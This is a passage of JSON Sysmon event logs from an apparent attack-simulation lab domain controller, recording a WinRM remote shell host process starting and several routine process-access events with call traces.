06:54:55.567","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"3916","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":4686,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:55.576\r\nProcessGuid: {E2A3D6B1-11BF-5F25-0000-0010226F0600}\r\nProcessId: 4184\r\nImage: C:\\Windows\\System32\\winrshost.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Host Process for WinRM's Remote Shell plugin\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: winrshost.exe\r\nCommandLine: C:\\Windows\\system32\\WinrsHost.exe -Embedding\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {E2A3D6B1-11BF-5F25-0000-0020E96E0600}\r\nLogonId: 0x66EE9\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96\r\nParentProcessGuid: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nParentProcessId: 596\r\nParentImage: C:\\Windows\\System32\\svchost.exe\r\nParentCommandLine: C:\\Windows\\system32\\svchost.exe -k DcomLaunch","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:54:55.576","ProcessGuid":"{E2A3D6B1-11BF-5F25-0000-0010226F0600}","Image":"C:\\Windows\\System32\\winrshost.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Host Process for WinRM's Remote Shell plugin","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"winrshost.exe","CommandLine":"C:\\Windows\\system32\\WinrsHost.exe -Embedding","CurrentDirectory":"C:\\Windows\\system32\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{E2A3D6B1-11BF-5F25-0000-0020E96E0600}","LogonId":"0x66ee9","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96","ParentProcessGuid":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","ParentProcessId":"596","ParentImage":"C:\\Windows\\System32\\svchost.exe","ParentCommandLine":"C:\\Windows\\system32\\svchost.exe -k DcomLaunch","EventReceivedTime":"2020-08-01 06:54:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4687,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:55.567\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-11BF-5F25-0000-0010226F0600}\r\nTargetProcessId: 4184\r\nTargetImage: C:\\Windows\\system32\\WinrsHost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|c:\\windows\\system32\\rpcss.dll+35069|c:\\windows\\system32\\rpcss.dll+3a852|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:55.567","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-11BF-5F25-0000-0010226F0600}","TargetProcessId":"4184","TargetImage":"C:\\Windows\\system32\\WinrsHost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|c:\\windows\\system32\\rpcss.dll+35069|c:\\windows\\system32\\rpcss.dll+3a852|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4688,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:55.567\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-11BF-5F25-0000-0010226F0600}\r\nTargetProcessId: 4184\r\nTargetImage: C:\\Windows\\system32\\WinrsHost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:55.567","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-11BF-5F25-0000-0010226F0600}","TargetProcessId":"4184","TargetImage":"C:\\Windows\\system32\\WinrsHost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:54:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4689,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:55.567\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:55.567","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4690,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:55.567\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:55.567","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4691,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:55.567\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:55.567","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4692,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:55.567\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:55.567","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4693,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:55.567\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:55.567","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
